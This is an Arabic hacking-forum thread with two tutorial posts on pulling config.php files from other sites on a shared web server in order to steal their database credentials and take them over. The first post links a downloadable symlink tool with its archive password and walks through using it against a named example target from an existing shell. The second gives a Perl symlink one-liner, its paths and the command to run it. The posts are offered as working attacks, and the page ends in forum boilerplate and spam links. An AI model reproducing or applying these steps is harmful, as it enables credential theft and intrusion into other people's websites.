سحب الكونفيق شرح سحب الكونفيق طريقة سحب الكونفيق تخطي صلاحيات اليوزر قراءة الكونفيق طريقة قراءة الكونفيق قراءة الملفات شرح قراءة الملفات سحب الملفات شرح سحب الملفات


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الأعزاء اعضاء منتديات جيوش الهكرز

اليوم رح اشرح لكم شرح على السريع لانه كنت عم بشرحه لكم بالتفصيل مع صورة لكل خطوة لكن علق المتصفح وما قبل يستجيب فضغطي ارتفع :p خخخخ


شرح اليوم هو قراءة اي ملف على السيرفر

وهدفها هو ملف ال
config.php

الكل يعرف ما هو ال
config.php

لهاذا رح اشرحه على السريع

هاذا الملف يكون موجود داخله بيانات الإتصال بالقاعدة

وعند معرفة بيانات القاعدة يمكننا بالإتصال بها وتنفيذ اوامر عليها واختراق الموقع

اولا تحميل الاداة

http://www.aljyyosh.info/aljyyosh/tools/sym.zip

باسوورد فك الضغط
www.aljyyosh.com

شرح الاداة

اولا نقوم برفع الأداة على الموقع اللي معانا شيل عليه

فمثلا الموقع هاذا
www.aljyyosh.com

وبدنا نخترق موقع اخر على السيرفر نفسه

وهذا الموقع مثلا

http://www.forumsade.net

وبدنا نقرا الكونفيق حق الموقع من شان نخترقه

ثانيا:- نقوم بإستخراج اليوزرات لحتى نعرف مين اليوزر الخاص لهاذا الموقع


شوفو الصورة هذه ورح توضح لكم كل شيء



طيب الان وجدنا يوزر هاذا الموقع
http://www.forumsade.net
وهو
forumsad

مسار الكونفيق في هاذا الموقع هو

كود:
/home/forumsad/public_html/includes/config.php


الان رح نستخرج الكونفيق

كما في الصورة هذه



صورة بعد قراءة الكونفيق



الان تم قراءة الكونفيق بنجاح
ومن المحتمل في بعض السيرفرات ما تشتغل هذه الطريقة لكن يوجد طرق اخرى رح تشتغل معك.! ، وهذه الطريقة شغالة على معظم السيرفرات.
وفي حالة كون الطريقة غيّر شغالة او قمت بسحب ملف غير موجود (يعني مساره خطأ) على السيرفر رح يظهر لك خطأ الـ
Forbidden

الشرح انتهى

ملاحظة هامة :- بين قراءة كل كونفيق وكونفيق على السيرفر يتوجب حذف كوكيز المتصفح بين كل قراءة وقراءة

تحياتي للجميع


 

رد مع اقتباس
قديم 06-24-2012   #10
عضو جديد


الصورة الرمزية مصطفى النجفي
مصطفى النجفي غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 460
 تاريخ التسجيل :  Nov 2011
 أخر زيارة : 09-27-2012 (03:03 PM)
 المشاركات : 12 [ + ]
 التقييم :  10
لوني المفضل : Cadetblue
افتراضي هكر المدينه



بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتديات جيوش الهكرز الكرام

اليوم سوف اشرح لكم طريقة تخطي صلاحية اليوزر بالدالة الـ symlink عن طريق البيرل وقراءة الكونفيق

الكثير من المبتدأين يحاول يقرأ الكونيق بدالة symlink عن طريق الـ php ، كما شرحتها في الدرس السابق
على الرابط التالي
http://www.aljyyosh.com/vb/showthread.php?t=17624


لكن في بعض السيرفرات تجرب عن طريق الدرس السابق فيظهر لك Forbidden

الكثير يترك السيرفر وما يخترقه ، لكن كل شيء له حل

بإمكانك عن طريق البيرل تسحبه بدالة ال symlink


فكل ما عليك فعله هو رفع ملف aljyyosh.pl

ووضع داخله هذا المحتوى


كود:
#!/usr/bin/perlsymlink("/home/aljyyosh/public_html/includes/config.php","/home/user/public_html/asdely.txt");
/home/aljyyosh/public_html/includes/config.php = مسار الكونفيق المراد سحبها
لا تنسى ان aljyyosh = يوزر الموقع
home/user/public_html/file.txt = مسار وضع الكونفيق المسحوبه
user = يوزر الموقع اللي انت موجود فيه


بعد رفع الملف

انتقل الى خانة تنفيذ الاوامر
ونفذ امر perl aljyyosh.pl

عندها سوف تجد ملف اسمه asdely.txt

استعرضه ورح تجد داخله الكونفيق

طبعا مش تقول لي كيف استعرضه! انا شرحة المسارات في الدروس السابقة


بالتوفيق


 

رد مع اقتباس
إضافة رد

الكلمات الدلالية (Tags)
هكر المدينه مع تحياتي

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

Facebook Comments by: ABDU_GO - شركة الإبداع الرقمية

الساعة الآن 04:38 PM بتوقيت بفداد



HêĽм √ 3.2 OPS BY: ! ωαнαм ! © 2011-2012
جميع الحقوق محفوظه لمنتديات أمجاد الحب

Security team

تصميم كادي بنت عبدالله - ديزاين فور يو

التبادل الاعلاني النصي لطلب التبادل او الاعلانات النصية يرجى اضافة الاميل التالي  tuama_2002@yahoo.com

شات صوتي

العاب بنات

دردشة صوتية

عسلي

تعارف بلاك بيري

دردشة عراقنا

دردشة الحب الاول

دردشة عراقنا1

بنات المسيب

دردشة عالم الرومانسية

صور حزينة

صورة اجمل امرأة

دعاء الصباح

منتديات

منتديات احلى حكاية

دردشة

دردشة عراقنا

شات كتابي

دردشة كتابية

دردشة عراقية

لعبة زوما

لعبة المزرعة السعيدة

لعبة ماريو

منتديات

افلام اون لاين

لعبة جاتا

دردشة دم عراقي

شات 12

دردشة العراق الصوتية

دردشة العراق الصوتية

العاب طبخ

العاب سيارات

رابط نصي

رابط نصي

رابط نصي

العاب تلبيس

العاب تلبيس بنات

العاب فلاش 2013

صور2013

شبكة العاب فلاش